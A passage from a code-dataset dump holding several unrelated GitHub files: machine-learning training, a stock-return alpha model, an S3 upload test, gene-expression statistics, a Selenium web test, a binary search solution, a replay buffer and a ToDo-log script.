by specifying the optimizer, loss function, and evaluation metrics:\nOptimizer: 'adam', an efficient gradient descent optimization algorithm.\nLoss function: 'sparse_categorical_crossentropy' suitable for multi-class classification tasks.\nMetrics to track during training: 'accuracy'.'''\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n'''Train the Model: Fits the model to the training data (train_images, train_labels) for 10 epochs. \nAlso validates the model's performance using the test data during training (validation_data=(test_images, test_labels)).'''\nhistory = model.fit(train_images, train_labels, epochs=10, validation_data=(test_images, test_labels))\n\n'''Evaluate the Model: Calculates the loss and accuracy of the trained model on the test dataset using model.evaluate().'''\ntest_loss, test_accuracy = model.evaluate(test_images, test_labels)\n\n'''Calculate Predictions: Generates predictions using the trained model on the test images and obtains the class \nlabels with the highest probability using np.argmax() along the last axis.'''\npredictions = np.argmax(model.predict(test_images), axis=-1)\n\n'''Generate Confusion Matrix: Computes the confusion matrix using confusion_matrix from Scikit-learn, \ncomparing test_labels with predictions.'''\nconf_matrix = confusion_matrix(test_labels, predictions)\n\n'''Plot Confusion Matrix: Displays the confusion matrix using plt.imshow() to visualize the model's performance in \nclassifying different categories.'''\nplt.figure(figsize=(8, 6))\nplt.imshow(conf_matrix, cmap=plt.cm.Blues)\nplt.title('Confusion Matrix')\nplt.colorbar()\nplt.xlabel('Predicted Labels')\nplt.ylabel('True Labels')\nplt.show()\n\n'''Print Evaluation Metrics: Outputs the test accuracy obtained from model.evaluate().'''\nprint(f'Test accuracy: {test_accuracy}')","repo_name":"Szykuc2001/NAI_Labs","sub_path":"Lab5/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9115431145","text":"#!/usr/bin/env python \n\nfrom __future__ import print_function\nfrom regress import *\nfrom loaddata import *\nfrom util import *\n\ndef wavg(group):\n b = group['pbeta']\n d = group['overnight_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\ndef wavg2(group):\n b = group['pbeta']\n d = group['overnight_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\ndef wavg3(group):\n b = group['pbeta']\n d = group['cur_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\n\ndef calc_c2o_daily(daily_df, horizon):\n print(\"Caculating daily c2o...\")\n result_df = filter_expandable(daily_df)\n\n print(\"Calculating c2o0...\")\n# result_df['c2o0'] = result_df['overnight_log_ret'] / result_df['pbeta']\n result_df['bret'] = result_df[['overnight_log_ret', 'pbeta', 'mkt_cap_y', 'gdate']].groupby('gdate').apply(wavg).reset_index(level=0)['pbeta']\n result_df['badjret'] = result_df['overnight_log_ret'] - result_df['bret']\n\n # result_df['c2o0_B'] = result_df['log_ret'] * (1 + np.abs(result_df['badjret'])) ** 3\n result_df['c2o0'] = result_df['badjret']\n result_df.ix[ np.abs(result_df['c2o0']) < .02 , 'c2o0'] = 0\n result_df['c2o0_B'] = winsorize_by_date(result_df['c2o0'])\n\n result_df = result_df.dropna(subset=['c2o0_B'])\n\n demean = lambda x: (x - x.mean())\n indgroups = result_df[['c2o0_B', 'gdate', 'ind1']].groupby(['gdate', 'ind1'], sort=False).transform(demean)\n result_df['c2o0_B_ma'] = indgroups['c2o0_B']\n \n print(\"Calulating lags...\")\n for lag in range(1,horizon+1):\n shift_df = result_df.unstack().shift(lag).stack()\n result_df['c2o' + str(lag) + '_B_ma'] = shift_df['c2o0_B_ma']\n \n return result_df\n\ndef calc_c2o_intra(intra_df):\n print(\"Calculating c2o intra...\")\n result_df = filter_expandable(intra_df)\n\n print(\"Calulating c2oC...\")\n result_df['cur_log_ret'] = np.log(result_df['iclose']/result_df['dopen'])\n result_df['bretC'] = result_df[['cur_log_ret', 'pbeta', 'mkt_cap_y', 'giclose_ts']].groupby(['giclose_ts'], sort=False).apply(wavg3).reset_index(level=0)['pbeta']\n result_df['badjretC'] = result_df['cur_log_ret'] - result_df['bretC']\n\n result_df['bret'] = result_df[['overnight_log_ret', 'pbeta', 'mkt_cap_y', 'giclose_ts']].groupby(['giclose_ts'], sort=False).apply(wavg2).reset_index(level=0)['pbeta']\n result_df['badjret'] = result_df['overnight_log_ret'] - result_df['bret']\n\n# result_df['c2oC_B'] = result_df['badjretC'] * (1 + np.abs(result_df['badjret'])) ** 3 \n result_df['c2oC'] = result_df['badjret']\n result_df.ix[ np.abs(result_df['c2oC']) < .02 , 'c2oC'] = 0\n result_df['c2oC_B'] = winsorize_by_ts(result_df['c2oC'])\n result_df = result_df.dropna(subset=['c2oC_B'])\n\n print(\"Calulating c2oC_ma...\")\n demean = lambda x: (x - x.mean())\n indgroups = result_df[['c2oC_B', 'giclose_ts', 'ind1']].groupby(['giclose_ts', 'ind1'], sort=False).transform(demean)\n result_df['c2oC_B_ma'] = indgroups['c2oC_B']\n\n return result_df\n\ndef c2o_fits(daily_df, intra_df, horizon, name, middate):\n # daily_df['dow'] = daily_df['gdate'].apply(lambda x: x.weekday())\n # daily_df['dow'] = daily_df['dow'].clip(0,1)\n # intra_df['dow'] = intra_df['date'].apply(lambda x: x.weekday())\n # intra_df['dow'] = intra_df['dow'].clip(0,1)\n insample_intra_df = intra_df\n insample_daily_df = daily_df\n outsample_intra_df = intra_df\n if middate is not None:\n insample_intra_df = intra_df[ intra_df['date'] < middate ]\n insample_daily_df = daily_df[ daily_df.index.get_level_values('date') < middate ]\n outsample_intra_df = intra_df[ intra_df['date'] >= middate ]\n\n outsample_intra_df['c2o'] = 0\n outsample_intra_df[ 'c2oC_B_ma_coef' ] = np.nan\n for lag in range(1, horizon+1):\n outsample_intra_df[ 'c2o' + str(lag) + '_B_ma_coef' ] = np.nan\n\n fits_df = pd.DataFrame(columns=['horizon', 'coef', 'indep', 'tstat', 'nobs', 'stderr'])\n\n fitresults_df = regress_alpha(insample_intra_df, 'c2oC_B_ma', horizon, True, 'intra_eod')\n fits_df = fits_df.append(fitresults_df, ignore_index=True)\n plot_fit(fits_df, \"c2o_intra_\"+name+\"_\" + df_dates(insample_intra_df))\n fits_df.set_index(keys=['indep', 'horizon'], inplace=True) \n \n unstacked = outsample_intra_df[ ['ticker'] ].unstack()\n coefs = dict()\n coefs[1] = unstacked.between_time('09:30', '10:31').stack().index\n coefs[2] = unstacked.between_time('10:30', '11:31').stack().index\n coefs[3] = unstacked.between_time('11:30', '12:31').stack().index\n coefs[4] = unstacked.between_time('12:30', '13:31').stack().index\n coefs[5] = unstacked.between_time('13:30', '14:31').stack().index\n coefs[6] = unstacked.between_time('14:30', '16:01').stack().index\n unstacked = None\n\n for ii in range(1,7):\n outsample_intra_df.ix[ coefs[ii], 'c2oC_B_ma_coef' ] = fits_df.ix['c2oC_B_ma'].ix[ii].ix['coef']\n\n #DAILY...\n fits_df = pd.DataFrame(columns=['horizon', 'coef', 'indep', 'tstat', 'nobs', 'stderr'])\n for lag in range(1,horizon+1):\n print(insample_daily_df.head())\n fitresults_df = regress_alpha(insample_daily_df, 'c2o0_B_ma', lag, True, 'daily') \n fits_df = fits_df.append(fitresults_df, ignore_index=True) \n plot_fit(fits_df, \"c2o_daily_\"+name+\"_\" + df_dates(insample_daily_df))\n fits_df.set_index(keys=['indep', 'horizon'], inplace=True) \n\n # for dow in range(0,2): \n # coef0 = fits_df.ix['c2o0_B_ma'].ix[horizon * 10 + dow].ix['coef']\n # for lag in range(1,horizon):\n # coef = coef0 - fits_df.ix['c2o0_B_ma'].ix[lag * 10 + dow].ix['coef'] \n # print \"Coef{}: {}\".format(lag, coef)\n # dowidx = outsample_intra_df[ outsample_intra_df['dow'] == dow ].index\n # outsample_intra_df.ix[ dowidx, 'c2o'+str(lag)+'_B_ma_coef' ] = coef\n\n coef0 = fits_df.ix['c2o0_B_ma'].ix[horizon].ix['coef']\n for lag in range(1,horizon):\n coef = coef0 - fits_df.ix['c2o0_B_ma'].ix[lag].ix['coef'] \n print(\"Coef{}: {}\".format(lag, coef))\n outsample_intra_df[ 'c2o'+str(lag)+'_B_ma_coef' ] = coef\n\n outsample_intra_df[ 'c2o'] = outsample_intra_df['c2oC_B_ma'] * outsample_intra_df['c2oC_B_ma_coef']\n for lag in range(1,horizon):\n outsample_intra_df[ 'c2o'] += outsample_intra_df['c2o'+str(lag)+'_B_ma'] * outsample_intra_df['c2o'+str(lag)+'_B_ma_coef']\n\n return outsample_intra_df\n\ndef calc_c2o_forecast(daily_df, intra_df, horizon, middate):\n daily_results_df = calc_c2o_daily(daily_df, horizon) \n forwards_df = calc_forward_returns(daily_df, horizon) \n daily_results_df = pd.concat( [daily_results_df, forwards_df], axis=1)\n intra_results_df = calc_c2o_intra(intra_df)\n intra_results_df = merge_intra_data(daily_results_df, intra_results_df)\n\n # sector_name = 'Energy'\n # print \"Running c2o for sector {}\".format(sector_name)\n # sector_df = daily_results_df[ daily_results_df['sector_name'] == sector_name ]\n # sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] == sector_name ]\n\n results = list()\n for sector_name in daily_results_df['sector_name'].dropna().unique():\n print(\"Running c2o for sector {}\".format(sector_name))\n sector_df = daily_results_df[ daily_results_df['sector_name'] == sector_name ]\n sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] == sector_name ]\n result_df = c2o_fits(sector_df, sector_intra_results_df, horizon, sector_name, middate)\n results.append(result_df)\n\n # sector_df = daily_results_df[ daily_results_df['sector_name'] != sector_name ]\n # sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] != sector_name ]\n # result2_df = c2o_fits(sector_df, sector_intra_results_df, horizon, \"ex\", middate)\n \n result_df = pd.concat(results, verify_integrity=True)\n return result_df\n\nif __name__==\"__main__\": \n parser = argparse.ArgumentParser(description='G')\n parser.add_argument(\"--start\",action=\"store\",dest=\"start\",default=None)\n parser.add_argument(\"--end\",action=\"store\",dest=\"end\",default=None)\n parser.add_argument(\"--mid\",action=\"store\",dest=\"mid\",default=None)\n parser.add_argument(\"--horizon\",action=\"store\",dest=\"horizon\",default=1)\n parser.add_argument(\"--freq\",action=\"store\",dest=\"freq\",default='15Min')\n args = parser.parse_args()\n \n start = args.start\n end = args.end\n lookback = 30\n freq = args.freq\n horizon = int(args.horizon)\n pname = \"./c2o\" + start + \".\" + end\n start = dateparser.parse(start)\n end = dateparser.parse(end)\n middate = dateparser.parse(args.mid)\n\n loaded = False\n try:\n daily_df = pd.read_hdf(pname+\"_daily.h5\", 'table')\n intra_df = pd.read_hdf(pname+\"_intra.h5\", 'table')\n loaded = True\n except:\n print(\"Did not load cached data...\")\n\n if not loaded:\n uni_df = get_uni(start, end, lookback)\n BARRA_COLS = ['ind1', 'pbeta']\n barra_df = load_barra(uni_df, start, end, BARRA_COLS)\n PRICE_COLS = ['close', 'overnight_log_ret', 'tradable_volume', 'tradable_med_volume_21']\n price_df = load_prices(uni_df, start, end, PRICE_COLS)\n daily_df = merge_barra_data(price_df, barra_df)\n DBAR_COLS = ['close', 'dopen', 'dvolume']\n daybar_df = load_daybars(price_df[ ['ticker'] ], start, end, DBAR_COLS, freq)\n intra_df = merge_intra_data(daily_df, daybar_df)\n daily_df.to_hdf(pname+\"_daily.h5\", 'table', complib='zlib')\n intra_df.to_hdf(pname+\"_intra.h5\", 'table', complib='zlib')\n\n outsample_df = calc_c2o_forecast(daily_df, intra_df, horizon, middate)\n dump_alpha(outsample_df, 'c2o')\n# dump_all(outsample_df)\n","repo_name":"timothyyu/ml_monorepo","sub_path":"statarb/to_convert/c2o.py","file_name":"c2o.py","file_ext":"py","file_size_in_byte":9858,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"37453569707","text":"import boto3\nimport botocore\nfilename = 'src.zip'\nbucket_name = 'matterhart-test'\ns3_resource = boto3.resource('s3')\nfor bucket in s3_resource.buckets.all():\n print(bucket.name)\ndata = open(filename, 'rb')\ns3_resource.Bucket(bucket_name).put_object(Key=filename, Body=data)\n\n# try:\n# s3_resource.Bucket(bucket_name).download_file(filename, 'dbtable_posts2.p')\n# except botocore.exceptions.ClientError as e:\n# if e.response['Error']['Code'] == \"404\":\n# print(\"The object does not exist.\")\n# else:\n# raise\n\n#%%","repo_name":"joelchan/code","sub_path":"conservex/src/botoTest.py","file_name":"botoTest.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9697251423","text":"import statsmodels.api as sm\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.stats as stats\r\n\r\nvar_table = pd.read_excel(\"GSE39582_var_table.xlsx\")\r\nmatrix_table = pd.read_excel(\"GSE39582_series_matrix_table.xlsx\", index_col=\"ID_REF\")\r\n#matrix_table = matrix_table.iloc[:, :566]\r\ngpl = pd.read_excel(\"GPL570-55999.xlsx\", index_col=\"ID\")\r\n\r\ntumor_stage_na = np.where(var_table[\"Var_05_tnm.stage\"].values == 'N/A', True, False)\r\ntumor_stage_0 = np.where(var_table[\"Var_05_tnm.stage\"].values == 0, True, False)\r\ntumor_stage_1 = np.where(var_table[\"Var_05_tnm.stage\"].values == 1, True, False)\r\nt01_or = np.logical_or(tumor_stage_0, tumor_stage_1)\r\n\r\nt01_or_X = matrix_table.iloc[:, t01_or]\r\nt01_or_y = var_table[\"Var_05_tnm.stage\"][t01_or]\r\n\r\nprint(\"# of stage0: {0} / # of stage1: {1}\".format(tumor_stage_0.sum(), tumor_stage_1.sum()))\r\nprint(\"Total # of stage01_data: {}\".format(t01_or.sum()))\r\n\r\n\r\ntumor = {}\r\nfor i in range(t01_or_X.shape[0]):\r\n X, y = t01_or_X.iloc[i, :].values, list(t01_or_y)\r\n X = sm.add_constant(X)\r\n X[:,1] = 0 #remove NaN to 0\r\n model = sm.OLS(y, X)\r\n result = model.fit()\r\n tumor[t01_or_X.index[i]] = float(result.t_test([1, 0]).pvalue)\r\n\r\nprint(len(tumor))\r\n\r\ntumor_sort = sorted(tumor.items(), key=lambda item: item[1])\r\n\r\ntumor_p_value = np.array(list(tumor.values()), dtype=np.float)\r\nprint(np.sum(np.where(tumor_p_value < 0.001, 1, 0)))\r\n\r\nsignificant_probe = list()\r\nfor dt in tumor_sort:\r\n if dt[1] < 0.001:\r\n significant_probe.append(dt[0])\r\n\r\ngpl_drop = gpl.loc[significant_probe, \"Gene Symbol\"].values\r\nunique_gene = set()\r\nfor i in gpl_drop:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n else:\r\n pass\r\nlen(unique_gene)\r\n\r\ntop10 = list()\r\ni = 0\r\nwhile len(top10) < 10:\r\n probe_name = tumor_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"Gene Symbol\"]\r\n if candidate in top10 or candidate is np.nan:\r\n continue\r\n else:\r\n top10.append(candidate)\r\n\r\nprint(top10)\r\n\r\n#(used code) – t-test\r\nbenign = np.logical_or(np.where(var_table[\"Var_05_tnm.stage\"].values == 0, True, False),\r\n np.where(var_table[\"Var_05_tnm.stage\"].values == 1, True, False))\r\nbenign = np.logical_or(benign, np.where(var_table[\"Var_05_tnm.stage\"].values == 2, True, False))\r\nbenign_matrix = matrix_table.iloc[:, benign]\r\nmalignant = np.logical_or(np.where(var_table[\"Var_05_tnm.stage\"].values == 3, True, False),\r\n np.where(var_table[\"Var_05_tnm.stage\"].values == 4, True, False))\r\nmalignant_matrix = matrix_table.iloc[:, malignant]\r\n\r\nprint(\"# of benign: {0} / # of malignant: {1}\".format(benign.sum(), malignant.sum()))\r\n\r\nmalig_p_value_dict = {}\r\nfor i in range(benign_matrix.shape[0]):\r\n M_data, WT_data = benign_matrix.iloc[i, :].values, malignant_matrix.iloc[i, :].values\r\n static, p_value = stats.ttest_ind(M_data, WT_data)\r\n malig_p_value_dict[benign_matrix.index[i]] = float(p_value)\r\n\r\nmalig_p_value_dict_sort = sorted(malig_p_value_dict.items(), key=lambda item: item[1])\r\n\r\nmalig_p_value = np.array(list(malig_p_value_dict.values()), dtype=np.float)\r\nprint(np.sum(np.where(malig_p_value < 0.001, 1, 0)))\r\n\r\n\r\nsignificant_probe = list()\r\nfor dt in malig_p_value_dict_sort:\r\n if dt[1] < 0.001:\r\n significant_probe.append(dt[0])\r\n\r\ngpl_drop = gpl.loc[significant_probe, \"Gene Symbol\"].values\r\nunique_gene = set()\r\nfor i in gpl_drop:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n else:\r\n pass\r\nlen(unique_gene)\r\n\r\ntop10 = list()\r\ni = 0\r\nwhile len(top10) < 10:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"Gene Symbol\"]\r\n if candidate in top10 or candidate is np.nan:\r\n continue\r\n else:\r\n top10.append(candidate)\r\n\r\nprint(top10)\r\n\r\n\r\n\r\nprint(\"#5#######################################################\")\r\nentrez = pd.read_csv(\"c5.all.v7.4.entrez.gmt.csv\", header=None, index_col=0)\r\nentrez_p_value = {}\r\n\r\nmalig_entrez = list()\r\ni = 0\r\nwhile malig_p_value_dict_sort[i][1] < 0.001:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"ENTREZ_GENE_ID\"]\r\n if candidate is np.nan:\r\n continue\r\n else:\r\n if type(candidate) == str:\r\n candidate = candidate.split(\" /// \")[0]\r\n malig_entrez.append(candidate)\r\n\r\nmalig_size = len(np.unique(malig_entrez))\r\n\r\n\r\ngene_id = gpl[\"ENTREZ_GENE_ID\"].values\r\nunique_gene = set()\r\nfor i in gene_id:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n elif type(i) == int:\r\n unique_gene.add(i)\r\n else:\r\n continue\r\nentrez_size = len(unique_gene)\r\nunique_gene = np.array(list(unique_gene))\r\n\r\nfor i in range(entrez.shape[0]):\r\n if entrez.index[i][:2] == \"GO\":\r\n info = entrez.iloc[i, :].values\r\n info = info[~np.isnan(info)].astype(np.int32)\r\n a = len(np.unique(np.intersect1d(malig_entrez, info)))\r\n b = len(np.unique(np.intersect1d(unique_gene, info)))\r\n #print(a, b)\r\n _, pvalue = stats.fisher_exact([[a, b], [malig_size - a, entrez_size - b]])\r\n entrez_p_value[entrez.index[i]] = pvalue\r\n\r\n\r\nentrez_p_value_dict_sort = sorted(entrez_p_value.items(), key=lambda item: item[1])\r\n\r\nentrez_p_value = np.array(list(entrez_p_value.values()), dtype=np.float)\r\nprint(np.sum(np.where(entrez_p_value < 0.001, 1, 0)))\r\n\r\nfor i in range(10):\r\n print(entrez_p_value_dict_sort[i])\r\n'''\r\ngo_table = pd.read_csv(\"c5.all.v7.4.entrez.gmt.csv\", header=None, index_col=0).T\r\n\r\ngo_table_pvalue = {}\r\n\r\n\r\n#malig = tumor 3 4 stage\r\nmalig = list()\r\ni =0\r\nwhile malig_p_value_dict_sort[i][1] <0.001:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"ENTREZ_GENE_ID\"] #mapping gpl and GO_id\r\n if candidate is np.nan:\r\n continue #nan exception handling\r\n else:\r\n if type(candidate) == str:\r\n candidate = candidate.split(\" /// \")[0] #remove useless genes after ///\r\n malig.append(candidate)\r\n\r\nmalig_size = len(np.unique(malig)) #unique gene size_malig go table\r\nprint(\"malig_unique gene size:{}\",malig_size) #1633\r\n\r\ngene_id = gpl[\"ENTREZ_GENE_ID\"].values\r\nunique_gene_go = set()\r\nfor i in gene_id:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene_go.add(id_list[0])\r\n elif type(i) == int:\r\n unique_gene_go.add(i)\r\n else:\r\n continue\r\ngo_table_size = len(np.unique(unique_gene_go)) #unique gene size in gpl #21180\r\nunique_gene_go = np.array(list(unique_gene_go)) #len: 21712\r\n\r\nfor i in range(go_table.shape[0]):\r\n if go_table.index[i][:2] == \"GO\":\r\n info = go_table.iloc[i, :].values\r\n info = info[~np.isnan(info)].astype(np.int32)\r\n a = len(np.unique(np.intersect1d(malig, info)))\r\n b = len(np.unique(np.intersect1d(unique_gene, info)))\r\n print(a, b)\r\n _, pvalue = stats.fisher_exact([[a, b], [malig_size - a, go_table_size - b]])\r\n go_table_pvalue[go_table.index[i]] = pvalue\r\n'''\r\n","repo_name":"SOOJEONGKIMM/Bioinformatics","sub_path":"four.py","file_name":"four.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27311936326","text":"import pytest\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom settings import *\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef test_show_my_pets():\n # Ввод email\n pytest.driver.find_element(By.ID, 'email').send_keys(valid_email)\n # Ввод пароля\n pytest.driver.find_element(By.ID, 'pass').send_keys(valid_password)\n # Нажимаю на кнопку входа в аккаунт\n pytest.driver.find_element(By.CSS_SELECTOR, 'button[type=\"submit\"]').click()\n # Нажимаю на кнопку \"Мои питомцы\"\n WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[contains(text(), \"Мои питомцы\")]'))\n ).click()\n\n # Собираю инфу по именам, фото, породам и возростам питомцев\n names = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[1]'))\n )\n\n species = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[2]'))\n )\n\n ages = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[3]'))\n )\n\n images = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/th/img'))\n )\n\n # Вывожу количество питомцев из статистики пользователя\n pets_amount = int(pytest.driver.find_element(By.XPATH, '/html/body/div[1]/div/div[1]').text.split()[2])\n # Сравнивыю количество имен и количество питомцев из статистики пользователя\n assert len(names) == pets_amount\n\n # Считаю количество питомцев с фото\n count_images = 0\n for i in range(len(images)):\n if images[i].get_attribute('src'):\n count_images += 1\n # Убеждаюсь, что хотя бы у половины питомцев есть фото\n assert count_images >= pets_amount / 2\n\n # Считаю количество непустых элементов списков\n count_names = 0\n for i in range(len(names)):\n if names[i].text:\n count_names += 1\n count_species = 0\n for i in range(len(species)):\n if species[i].text:\n count_species += 1\n count_ages = 0\n for i in range(len(ages)):\n if ages[i].text:\n count_ages += 1\n # Убеждаюсь, что у всех питомцев есть имя, возраст и порода.\n assert count_names == count_species == count_ages == pets_amount\n\n # Вывожу все имена питомцев в список\n list_names = []\n for i in range(len(names)):\n list_names.append(names[i].text)\n # Убеждаюсь, что у всех питомцев разные имена.\n assert len(list_names) == len(set(list_names))\n\n # Составляю список описаний питомцев\n pet = []\n pets = []\n for i in range(len(names)):\n pet.append(names[i].text)\n pet.append(species[i].text)\n pet.append(ages[i].text)\n pets.append(tuple(pet))\n pet = []\n # Убеждаюсь, что в списке нет повторяющихся питомцев (у которых одинаковые имя, порода и возраст).\n assert len(pets) == len(set(pets))\n","repo_name":"anatole365/PetFriendsUiTests","sub_path":"test_selenium_simple.py","file_name":"test_selenium_simple.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71007241014","text":"#!/usr/bin/python\n\n# 핵심은 특정 거리보다 멀리 떨어진 지점의 '개수'를 구한다는 것이다.\n# 이때, 특정 거리를 이분 탐색으로 구한다.\n\nn, c = map(int, input().split())\nhouse_position = sorted([int(input()) for _ in range(n)])\ndistance_low = 1\ndistance_high = house_position[-1]\n\nanswer = 0\n\nwhile distance_low <= distance_high:\n distance = (distance_high+distance_low) // 2\n\n house_left = house_position[0]\n count = 1\n\n for i in range(1, n):\n house_right = house_position[i]\n\n if house_right - house_left >= distance:\n count += 1\n house_left = house_right\n\n if count >= c:\n answer = distance\n distance_low = distance + 1\n else:\n distance_high = distance - 1\n\nprint(answer)","repo_name":"c0natus/Practice","sub_path":"Algorithm-practice/BaekJoon/Sliver or less/B2110.py","file_name":"B2110.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11450504563","text":"import cleanup\r\nimport globals\r\n\r\ndef combineTSV( sourceFiles, targetFile ):\r\n cleanup.createDirIfNotExist( globals.TSV_BIN )\r\n output = \"\"\r\n\r\n for file in sourceFiles:\r\n with open( file, \"r\" ) as f:\r\n for line in f:\r\n output += line.replace( \",\", \"\\t\") if file.endswith( \".csv\" ) else line \r\n \r\n if targetFile.endswith( \".tsv\" ):\r\n targetFile = targetFile[ :targetFile.rfind( \".\" ) ] + \".tsv\"\r\n\r\n with open( globals.TSV_BIN + targetFile, \"w\" ) as o:\r\n for line in output:\r\n o.write( line )\r\n ","repo_name":"adsuth/VGMU-batchTSVParser","sub_path":"songParser/tsv_combiner.py","file_name":"tsv_combiner.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72645279092","text":"from abc import ABC, abstractmethod\nimport os\nimport pickle as pkl\n\n\nclass ReplayBuffer(ABC):\n\n def __init__(\n self,\n monitor=None,\n logging_prefix=\"\"\n ):\n self.monitor = monitor\n self.logging_prefix = logging_prefix\n\n # storage structures for the samples collected\n self.observations = None\n self.actions = None\n self.rewards = None\n self.terminals = None\n\n # parameters to indicate the size of the buffer\n self.head = 0\n self.size = 0\n self.total_steps = 0\n self.total_paths = 0\n\n def log(\n self\n ):\n if self.monitor is not None:\n # record the current size of the buffer\n self.monitor.record(self.logging_prefix + \"head\", self.head)\n self.monitor.record(self.logging_prefix + \"size\", self.size)\n\n # record the total amount of samples collected\n self.monitor.record(self.logging_prefix + \"total_steps\", self.total_steps)\n self.monitor.record(self.logging_prefix + \"total_paths\", self.total_paths)\n\n def save(\n self,\n logging_dir\n ):\n # save the replay buffer to disk\n replay_path = os.path.join(logging_dir, self.logging_prefix + \"replay.buffer\")\n if not os.path.exists(os.path.dirname(replay_path)):\n os.makedirs(os.path.dirname(replay_path))\n with open(replay_path, \"wb\") as f:\n state = dict(\n observations=self.observations,\n actions=self.actions,\n rewards=self.rewards,\n terminals=self.terminals,\n size=self.size,\n head=self.head,\n total_steps=self.total_steps,\n total_paths=self.total_paths)\n pkl.dump(state, f)\n\n def load(\n self,\n logging_dir\n ):\n # load the replay buffer from disk if it exists\n replay_path = os.path.join(logging_dir, self.logging_prefix + \"replay.buffer\")\n if os.path.exists(replay_path):\n with open(replay_path, \"rb\") as f:\n state = pkl.load(f)\n self.observations = state[\"observations\"]\n self.actions = state[\"actions\"]\n self.rewards = state[\"rewards\"]\n self.terminals = state[\"terminals\"]\n self.size = state[\"size\"]\n self.head = state[\"head\"]\n self.total_steps = state[\"total_steps\"]\n self.total_paths = state[\"total_paths\"]\n\n @abstractmethod\n def insert_path(\n self,\n observations,\n actions,\n rewards\n ):\n return NotImplemented\n\n @abstractmethod\n def sample(\n self,\n batch_size\n ):\n return NotImplemented\n","repo_name":"brandontrabucco/cs285","sub_path":"cs285/data/replay_buffers/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7743673805","text":"#!/usr/bin/env python3\n\nimport sys, os, os.path, tempfile, shutil, time, datetime, re\n\nTODO='ToDo:'\nDID='Did:'\nTODO_RX = re.compile(r\"^{0}\\s*\".format(TODO))\nDID_RX = re.compile(r\"^{0}\\s*\".format(DID))\nSEP_START = \"^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^\\n\"\nSEP_END = \" ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^\\n\"\nDATE_FMT = \"%a %b %d %Y %I:%M:%S %p %Z\"\nMAX_SEARCH = 100 # lines\nDEBUG = os.environ.get('DEBUG', False)\n\ndef d(msg):\n if bool(DEBUG):\n print(\"{0}\".format(msg))\n sys.stderr.flush()\n\ndef show_usage():\n print(\"Usage: {0} \\n\".format(os.path.basename(sys.argv[0])))\n print(\"Where is a log file to be prefixed with ToDo/Did/DateTime\\n\")\n\n\ndef get_todo_regex():\n return TODO_RX\n\n\ndef get_did_regex():\n return DID_RX\n\n\ndef get_date_fmt():\n return DATE_FMT\n\n\ndef last_todo(logfile):\n d(\"Rewinding logfile to beginning, searching for the most recent TODO block\")\n logfile.seek(0)\n got_todo = False\n todo_lines = []\n _max = MAX_SEARCH\n for line in logfile:\n _max -= 1\n if _max <= 0:\n raise RuntimeError(\"Could not find complete TODO section in first {0} lines\".format(MAX_SEARCH))\n line = str(line)\n line_no = MAX_SEARCH-_max\n if get_did_regex().search(line):\n d(\"Found {0} todo lines total after searching {1} 